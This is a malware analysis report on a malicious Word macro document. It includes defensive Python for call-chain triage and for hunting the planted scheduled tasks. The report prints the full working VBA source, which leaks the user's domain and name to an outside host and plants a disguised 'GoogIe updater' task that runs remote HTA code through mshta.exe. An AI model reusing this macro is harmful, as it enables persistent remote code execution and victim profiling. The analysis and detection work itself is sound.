Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 031b1af6e54cca10…

Verdict: MALICIOUS
File type: Office (OLE)
Size: 183.5 KB
Created (document metadata): 2021-05-06 10:26:00
Authoring application: Microsoft Office Word
First seen: 2021-06-28
MD5: 9f238e4d00f30cdf9e124374631508b5
SHA-1: 9bcab758eb81068f89163e579dba986a7e7b7814
SHA-256: 031b1af6e54cca103f6efa2838f3fa3f39bc3e34abab65ec4dc96682d7458536
Risk score: 314

Malware Insights

MITRE ATT&CK
T1566.001 Phishing: Spearphishing Attachment
T1204.002 User Execution: Malicious File
T1059.005 Command and Scripting Interpreter: Visual Basic
T1053.005 Scheduled Task/Job: Scheduled Task (two tasks registered by UserForm F1 through Schedule.Service)
T1218.005 System Binary Proxy Execution: Mshta (task action mshta.exe with a remote URL as its argument)
T1036.004 Masquerading: Masquerade Task or Service (task "GoogIe updater", author "GoogIe", with an upper-case I in place of l)
T1033 System Owner/User Discovery (Environ("USERDOMAIN") and Environ("USERNAME") placed in the HTTP User-Agent)
T1140 Deobfuscate/Decode Files or Information (carried over from the scanner; the recovered source is not obfuscated, so this tag is weak for this sample)

The sample contains VBA macros that run as soon as the document is opened. Three entry points (AutoOpen for Word, Workbook_Open for Excel, and Auto_Open, which the other two call) converge on Auto_Open, which runs under On Error Resume Next so that any failure is silently skipped. Auto_Open first calls LoadImg, which drives a hidden InternetExplorer.Application instance to https://tme.s03mdn.net/documents/img01.png with a User-Agent header that embeds Environ("USERDOMAIN") and Environ("USERNAME"). The macro never reads, saves or executes the response, so the practical effect of this request is a check-in that leaks the victim's domain\username to the operator, not the payload download. LoadImg then shows a Spanish fake error message (translated: "Your version of Microsoft Word is not compatible with this document. Please try again later. [ERROR CODE -143863]"), and Auto_Open hides the document's first shape. The second stage is staged by Load F1 followed by Unload F1: UserForm_Initialize uses Schedule.Service to register a daily task "GoogIe updater" (author "GoogIe") whose action is mshta.exe with the remote HTA https://es.cloud-datatransfer.com/documents/default/index.html as its argument, and UserForm_Terminate registers a second task "Starter" with a registration trigger (TriggerTypeRegister = 7) whose action is SCHTASKS.EXE /RUN /TN "GoogIe updater", so the first task fires immediately rather than waiting for 10:00. The result is a macro-based downloader with scheduled-task persistence and mshta.exe as the execution proxy. Module M1 holds a second, Private copy of LoadImg that points at https://es.cloud-datatransfer.com/home/favicon.ico; because it is Private to a standard module it cannot be called from ThisDocument and is never reached by any entry point.
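The chain described above can be recovered mechanically from the extracted source. The following Python is an added example written for this report, not part of the scanner's heuristics or of oletools: it splits macros.bas into modules on the VB_Name headers olevba keeps, lists the auto-exec entry points, follows bare calls and Load/Unload of UserForms to build the call chain (preferring the caller's own module, as VBA scoping does), collects URLs, CreateObject ProgIDs and Environ() reads, and decodes each Schedule.Service registration into a task name and command line. The embedded VBA_SRC is an abridged copy of the extracted script (the long IE.Navigate lines are shortened); the LOLBin list and the l/I lookalike check are this example's own choices.

```python
import re

# Abridged copy of the macros.bas extracted below: only the lines the triage
# keys on are kept (long lines shortened); the full script is under Extracted artifacts.
VBA_SRC = r'''Attribute VB_Name = "ThisDocument"
Sub AutoOpen()
    Auto_Open
End Sub
Sub Workbook_Open()
    Auto_Open
End Sub
Sub Auto_Open()
    On Error Resume Next
    LoadImg
    Load F1
    Unload F1
End Sub
Private Sub LoadImg()
    Set IE = CreateObject("InternetExplorer.Application")
    IE.Navigate "https://tme.s03mdn.net/documents/img01.png", "", "", "", "User-Agent: Mozilla/5.0 (" & Environ("USERDOMAIN") & "\" & Environ("USERNAME") & ") like Gecko"
End Sub
Attribute VB_Name = "M1"
Private Sub LoadImg()
    IE.Navigate "https://es.cloud-datatransfer.com/home/favicon.ico", "", "", "", ""
End Sub
Attribute VB_Name = "F1"
Private Sub UserForm_Initialize()
    drp = "https://es.cloud-datatransfer.com/documents/default/index.html"
    Set service = CreateObject("Schedule.Service")
    Action.Path = "mshta.exe"
    Action.Arguments = drp
    Call rootFolder.RegisterTaskDefinition( _
        "GoogIe updater", taskDefinition, 6, , , 3)
End Sub
Private Sub UserForm_Terminate()
    Set service = CreateObject("Schedule.Service")
    Action.Path = "SCHTASKS.EXE"
    Action.Arguments = "/RUN /TN ""GoogIe updater"""
    Call rootFolder.RegisterTaskDefinition( _
        "Starter", taskDefinition, 6, , , 3)
End Sub
'''

AUTOEXEC = {"autoopen", "auto_open", "document_open", "workbook_open", "autoexec"}
LOLBINS = {"mshta.exe", "schtasks.exe", "rundll32.exe", "regsvr32.exe", "wscript.exe",
           "cscript.exe", "powershell.exe", "certutil.exe"}  # example's own list
PROC_RE = re.compile(r'^\s*(?:Private |Public )?Sub (\w+)\(\)\s*$(.*?)^\s*End Sub', re.M | re.S)

def procedures(src):
    """Map 'Module.Proc' -> body, splitting modules on the VB_Name header olevba keeps."""
    parts = re.split(r'^Attribute VB_Name = "([^"]+)"[ \t]*$', src, flags=re.M)
    return {f"{parts[i]}.{name}": body
            for i in range(1, len(parts), 2)
            for name, body in PROC_RE.findall(parts[i + 1])}

def vba_string(tok, local_vars):
    """Resolve a VBA string operand: a variable assigned a literal, or a "..." literal."""
    if tok in local_vars:
        return local_vars[tok]
    return re.fullmatch(r'"((?:[^"]|"")*)"', tok).group(1).replace('""', '"')

def scheduled_task(proc, body):
    """Pull task name, executable and arguments out of a Schedule.Service registration."""
    literals = {k: v.replace('""', '"')
                for k, v in re.findall(r'^\s*(\w+) = "((?:[^"]|"")*)"[ \t]*$', body, re.M)}
    path = re.search(r'Action\.Path = "([^"]+)"', body).group(1)
    args = vba_string(re.search(r'Action\.Arguments = (.+)$', body, re.M).group(1).strip(), literals)
    name = re.search(r'RegisterTaskDefinition\(\s*_?\s*"([^"]+)"', body).group(1)
    return {"name": name, "registered_by": proc, "command": f"{path} {args}",
            "lolbin": path.lower() in LOLBINS,
            "lookalike": bool(re.search(r"[a-z]I[a-z]", name))}  # upper-case I posing as l

def reachable(report):
    """Procedures that actually run from the document-level auto-exec entry points."""
    seen, todo = set(), [p for p in report["entry_points"] if ".UserForm_" not in p]
    while todo:
        p = todo.pop()
        if p not in seen:
            seen.add(p)
            todo.extend(report["calls"].get(p, []))
    return seen

def triage(src):
    procs = procedures(src)
    report = {"entry_points": [], "calls": {}, "urls": set(), "progids": set(),
              "environ": set(), "tasks": []}
    for full, body in procs.items():
        mod, name = full.split(".")
        if name.lower() in AUTOEXEC or name.startswith("UserForm_"):
            report["entry_points"].append(full)
        edges = []
        # a bare identifier on its own line is a call; same module wins, as in VBA
        for callee in re.findall(r'^\s*(\w+)\s*$', body, re.M):
            cands = [f"{mod}.{callee}"] + [p for p in procs if p.endswith("." + callee)]
            hit = next((c for c in cands if c in procs), None)
            if hit:
                edges.append(hit)
        # Load/Unload of a UserForm fires its Initialize/Terminate event handlers
        for verb, form in re.findall(r'^\s*(Load|Unload) (\w+)\s*$', body, re.M):
            edges.append(f"{form}.UserForm_" + ("Initialize" if verb == "Load" else "Terminate"))
        report["calls"][full] = edges
        report["urls"].update(re.findall(r'https?://[^\s"]+', body))
        report["progids"].update(re.findall(r'CreateObject\("([^"]+)"\)', body))
        report["environ"].update(re.findall(r'Environ\("([^"]+)"\)', body))
        if "Schedule.Service" in body:
            report["tasks"].append(scheduled_task(full, body))
    report["dead_code"] = sorted(set(procs) - reachable(report))
    return report

if __name__ == "__main__":
    import json
    print(json.dumps(triage(VBA_SRC), indent=2, default=sorted))
```

Running it against the abridged source reports the three entry points plus the two form events, the chain Auto_Open -> LoadImg -> F1.UserForm_Initialize -> F1.UserForm_Terminate, both task registrations with their resolved command lines, and M1.LoadImg as the one procedure nothing reaches.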

Heuristics 12

  • ClamAV: Doc.Downloader.Generic-6698421-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Generic-6698421-0
  • VBA macros detected medium 7 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • LOLBin reference in VBA critical OLE_VBA_LOLBIN
    LOLBin reference in VBA
    Matched line in script
        Set Action = taskDefinition.Actions.Create(ActionTypeExec)
        Action.Path = "mshta.exe"
        Action.Arguments = drp
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    Private Sub LoadImg()
        Set IE = CreateObject("InternetExplorer.Application")
        IE.Visible = False
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Attribute VB_Customizable = True
    Sub AutoOpen()
        Auto_Open
  • Workbook_Open macro low OLE_VBA_WBOPEN
    Workbook_Open macro
    Matched line in script
    End Sub
    Sub Workbook_Open()
        Auto_Open
  • Auto_Open macro low OLE_VBA_AUTO
    Auto_Open macro
    Matched line in script
    Sub AutoOpen()
        Auto_Open
        Hide
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)
    Matched line in script
        IE.Visible = False
        IE.Navigate "https://tme.s03mdn.net/documents/img01.png", "", "", "", "User-Agent: Mozilla/5.0 (" & Environ("USERDOMAIN") & "\" & Environ("USERNAME") & ") (Windows NT 6.1; Trident/7.5;) like Gecko"
        Do While IE.Busy
  • Reference to mshta.exe high SC_STR_MSHTA
    Reference to mshta.exe
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself. For this sample the generic wording does not hold: a VBA project was recovered (macros.bas under Extracted artifacts), and the marker is simply the AutoOpen name of that project, so this finding adds nothing beyond OLE_VBA_AUTOOPEN.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    • https://tme.s03mdn.net/documents/img01.png  In document text (OLE body); IE.Navigate target of ThisDocument.LoadImg
    • https://es.cloud-datatransfer.com/home/favicon.ico  In document text (OLE body); IE.Navigate target of the unreachable M1.LoadImg
    • https://es.cloud-datatransfer.com/documents/default/index.html  In document text (OLE body); mshta.exe argument of the "GoogIe updater" task registered by F1.UserForm_Initialize

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename  Kind  Source  Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 5882 bytes
SHA-256: a0e86fcd6b6dd2eff55a0cb3d10fb4a4122e50f516ee5678df37f8b15625e152
Script preview (first 1,000 lines of the extracted source; the whole 5882-byte script fits in that window)
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
    Auto_Open
    Hide
End Sub
Sub Workbook_Open()
    Auto_Open
    Hide
End Sub
Sub Auto_Open()
    On Error Resume Next
    LoadImg
    Hide
    Load F1
    Unload F1
End Sub
Private Sub LoadImg()
    Set IE = CreateObject("InternetExplorer.Application")
    IE.Visible = False
    IE.Navigate "https://tme.s03mdn.net/documents/img01.png", "", "", "", "User-Agent: Mozilla/5.0 (" & Environ("USERDOMAIN") & "\" & Environ("USERNAME") & ") (Windows NT 6.1; Trident/7.5;) like Gecko"
    Do While IE.Busy
         DoEvents
    Loop
    IE.Quit
    Set IE = Nothing
    MsgBox "Su version de Microsoft Word no es compatible con este documento. Por favor, vuelva a intentarlo mas tarde. [ERROR CODE -143863]"
End Sub
Sub Hide()
    With ActiveDocument
        .Shapes(1).Visible = False
    End With
End Sub


Attribute VB_Name = "M1"
Private Sub LoadImg()
    Set IE = CreateObject("InternetExplorer.Application")
    IE.Visible = False
    IE.Navigate "https://es.cloud-datatransfer.com/home/favicon.ico", "", "", "", "User-Agent: Mozilla/5.0 (" & Environ("USERDOMAIN") & "\" & Environ("USERNAME") & ") (Windows NT 6.1; Trident/7.5;) like Gecko"
    Do While IE.Busy
         DoEvents
    Loop
    IE.Quit
    Set IE = Nothing
End Sub
Sub Hide()
    With ActiveDocument
        .Shapes(1).Visible = False
    End With
End Sub


Attribute VB_Name = "F1"
Attribute VB_Base = "0{9D977F62-D292-480F-BC8A-DBE5CD3457F6}{1DF173F6-D535-48F2-91EE-D8606A188815}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Private Sub UserForm_Initialize()
    
    ' Dropper URL
    Dim drp
    drp = "https://es.cloud-datatransfer.com/documents/default/index.html"

    ' A constant that specifies a daily trigger
    Const TriggerTypeDaily = 2
    ' A constant that specifies an executable action
    Const ActionTypeExec = 0
    
    Set service = CreateObject("Schedule.Service")
    Call service.Connect
    
    Dim rootFolder
    Set rootFolder = service.GetFolder("\")
    
    ' Create the task
    Dim taskDefinition
    Set taskDefinition = service.NewTask(0)
    
    ' Define information about the task
    Dim regInfo
    Set regInfo = taskDefinition.RegistrationInfo
    regInfo.Description = "GoogIe products auto-updater"
    regInfo.Author = "GoogIe"
    
    ' Set the task configuration
    Dim settings
    Set settings = taskDefinition.settings
    settings.Enabled = True
    settings.StartWhenAvailable = True
    settings.Hidden = False
    settings.DisallowStartIfOnBatteries = False
    settings.AllowDemandStart = True
    settings.RunOnlyIfNetworkAvailable = True
    settings.RunOnlyIfIdle = False
    settings.StopIfGoingOnBatteries = False
    settings.WakeToRun = True
    
    ' Create a daily trigger at 10:00:00. Time format: YYYY-MM-DDTHH:MM:SS
    Dim triggers
    Set triggers = taskDefinition.triggers
    Dim trigger
    Set trigger = triggers.Create(TriggerTypeDaily)
    
    Dim startTime
    startTime = "2006-05-02T10:00:00"  'Task runs at 10:00 AM
    
    trigger.StartBoundary = startTime
    trigger.DaysInterval = 1
    trigger.ID = "Daily"
    trigger.Enabled = True
    
    ' Create the action for the task to execute
    Dim Action
    Set Action = taskDefinition.Actions.Create(ActionTypeExec)
    Action.Path = "mshta.exe"
    Action.Arguments = drp
    
    ' Register the task.
    Call rootFolder.RegisterTaskDefinition( _
        "GoogIe updater", taskDefinition, 6, , , 3)

    F1.Hide
End Sub

Private Sub UserForm_Terminate()

    ' A constant that specifies a daily trigger
    Const TriggerTypeRegister = 7
    ' A constant that specifies an executable action
    Const ActionTypeExec = 0
    
    Set service = CreateObject("Schedule.Service")
    Call service.Connect
    
    Dim rootFolder
    Set rootFolder = service.GetFolder("\")
    
    ' Create the task
    Dim taskDefinition
    Set taskDefinition = service.NewTask(0)
    
    ' Define information about the task
    Dim regInfo
    Set regInfo = taskDefinition.RegistrationInfo
    regInfo.Description = "GoogIe products auto-updater"
    regInfo.Author = "GoogIe"
    
    ' Set the task configuration
    Dim settings
    Set settings = taskDefinition.settings
    settings.Enabled = True
    settings.StartWhenAvailable = True
    settings.Hidden = False
    settings.DisallowStartIfOnBatteries = False
    settings.AllowDemandStart = True
    settings.RunOnlyIfNetworkAvailable = True
    settings.RunOnlyIfIdle = False
    settings.StopIfGoingOnBatteries = False
    settings.WakeToRun = True
    
    ' Create a daily trigger at 10:00:00. Time format: YYYY-MM-DDTHH:MM:SS
    Dim triggers
    Set triggers = taskDefinition.triggers
    Dim trigger
    Set trigger = triggers.Create(TriggerTypeRegister)
    
    Dim startTime
    startTime = "2006-05-02T10:00:00"  'Task runs at 10:00 AM
    
    trigger.StartBoundary = startTime
    trigger.ID = "Now"
    trigger.Enabled = True
    
    ' Create the action for the task to execute
    Dim Action
    Set Action = taskDefinition.Actions.Create(ActionTypeExec)
    Action.Path = "SCHTASKS.EXE"
    Action.Arguments = "/RUN /TN ""GoogIe updater"""
    
    ' Register the task.
    Call rootFolder.RegisterTaskDefinition( _
        "Starter", taskDefinition, 6, , , 3)
End Sub
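Once the form has run, the evidence on the host is the two task definitions rather than the document. As an added example, not part of the report above, the Python below reads Task Scheduler XML, the format stored under C:\Windows\System32\Tasks and printed by `schtasks /Query /TN <name> /XML`, and flags what F1.UserForm_Initialize and F1.UserForm_Terminate produce: an Exec action whose command is a LOLBin, a remote URL as its argument, a RegistrationTrigger that fires the moment the task is registered, a schtasks /RUN that chains to another task, and an l/I lookalike in the task name or author. The three task definitions are constructed for the example to mirror the sample's registrations plus one benign control; they were not exported from an infected host, and the LOLBin list is the example's own.

```python
import re
import xml.etree.ElementTree as ET
from pathlib import PureWindowsPath

NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}
LOLBINS = {"mshta.exe", "rundll32.exe", "regsvr32.exe", "wscript.exe", "cscript.exe",
           "powershell.exe", "certutil.exe", "msiexec.exe", "schtasks.exe"}  # example's own list

# Constructed task definitions (not captured from a real host) in the XML shape
# Task Scheduler stores, mirroring what the sample's F1 form registers, plus a
# benign control that should produce no findings.
TASKS = {
    r"\GoogIe updater": """<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo><Author>GoogIe</Author><Description>GoogIe products auto-updater</Description></RegistrationInfo>
  <Triggers><CalendarTrigger><StartBoundary>2006-05-02T10:00:00</StartBoundary><Enabled>true</Enabled>
    <ScheduleByDay><DaysInterval>1</DaysInterval></ScheduleByDay></CalendarTrigger></Triggers>
  <Settings><RunOnlyIfNetworkAvailable>true</RunOnlyIfNetworkAvailable><WakeToRun>true</WakeToRun></Settings>
  <Actions Context="Author"><Exec><Command>mshta.exe</Command>
    <Arguments>https://es.cloud-datatransfer.com/documents/default/index.html</Arguments></Exec></Actions>
</Task>""",
    r"\Starter": """<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo><Author>GoogIe</Author><Description>GoogIe products auto-updater</Description></RegistrationInfo>
  <Triggers><RegistrationTrigger><Enabled>true</Enabled></RegistrationTrigger></Triggers>
  <Actions Context="Author"><Exec><Command>SCHTASKS.EXE</Command>
    <Arguments>/RUN /TN "GoogIe updater"</Arguments></Exec></Actions>
</Task>""",
    r"\Maintenance\WeeklyDefrag": """<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo><Author>Example Corp</Author></RegistrationInfo>
  <Triggers><CalendarTrigger><StartBoundary>2010-01-01T01:00:00</StartBoundary>
    <ScheduleByWeek><WeeksInterval>1</WeeksInterval></ScheduleByWeek></CalendarTrigger></Triggers>
  <Actions Context="Author"><Exec><Command>%windir%\\system32\\defrag.exe</Command>
    <Arguments>C: /O</Arguments></Exec></Actions>
</Task>""",
}

def assess(name, xml_text):
    """Return the reasons a task definition looks like macro-planted persistence."""
    task = ET.fromstring(xml_text)
    author = task.findtext("t:RegistrationInfo/t:Author", "", NS)
    findings = []
    # "GoogIe": an upper-case I inside an otherwise lower-case word is an l/I swap
    if re.search(r"[a-z]I[a-z]", f"{name} {author}"):
        findings.append("lookalike-name")
    # A RegistrationTrigger runs the task as soon as it is registered, which is how
    # the sample gets an immediate launch without starting mshta from Word itself
    if task.find("t:Triggers/t:RegistrationTrigger", NS) is not None:
        findings.append("runs-on-registration")
    for ex in task.findall("t:Actions/t:Exec", NS):
        cmd = (ex.findtext("t:Command", "", NS) or "").strip()
        args = (ex.findtext("t:Arguments", "", NS) or "").strip()
        exe = PureWindowsPath(cmd).name.lower()   # basename, case-folded
        if exe in LOLBINS:
            findings.append(f"lolbin:{exe}")
        if re.search(r"https?://", args, re.I):
            findings.append("remote-url-argument")
        chained = re.search(r'/RUN\b.*?/TN\s+"?([^"]+)"?', args, re.I) if exe == "schtasks.exe" else None
        if chained:
            findings.append(f"chains-to-task:{chained.group(1)}")
    return findings

def hunt(tasks):
    """Map task path -> findings, keeping only the tasks with something to report."""
    return {name: f for name, xml in tasks.items() if (f := assess(name, xml))}

if __name__ == "__main__":
    for name, findings in hunt(TASKS).items():
        print(name, "->", ", ".join(findings))
```

On a live host the same function can be fed the files under C:\Windows\System32\Tasks directly (they are UTF-16 XML, so decode before parsing); the "chains-to-task" finding is what ties the throwaway "Starter" task back to the persistent one.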